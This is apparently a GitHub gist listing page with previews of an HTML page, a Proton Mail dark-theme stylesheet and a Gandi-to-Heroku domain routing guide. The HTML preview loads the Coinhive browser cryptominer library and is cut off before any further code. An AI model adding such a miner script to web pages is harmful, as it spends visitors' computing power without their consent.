Skip to content

Instantly share code, notes, and snippets.

View v1ctorf's full-sized avatar
🏡
coding safely at home!

victorf v1ctorf

🏡
coding safely at home!
View GitHub Profile
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script type="text/javascript">
@dylants
dylants / proton-mail.css
Last active April 28, 2022 20:39
Dark Theme for Proton Mail
/* ProtonMail */
/* CLASSIC THEME */
body { font-size: 14px }
body,
.pm_opensans {
font-family: 'Lucida Grande', Verdana, Arial, sans-serif
}
@electricg
electricg / howto.md
Last active February 12, 2022 16:40
How to setup Gandi.net domain routing to Heroku

How to setup Gandi.net domain routing to Heroku

TODO: setup SSL.


This is a quick guide on how to setup domain and infinite subdomains, in a case where, for example, you may have one subdomain for each client.

Starting from this http://stackoverflow.com/a/39646701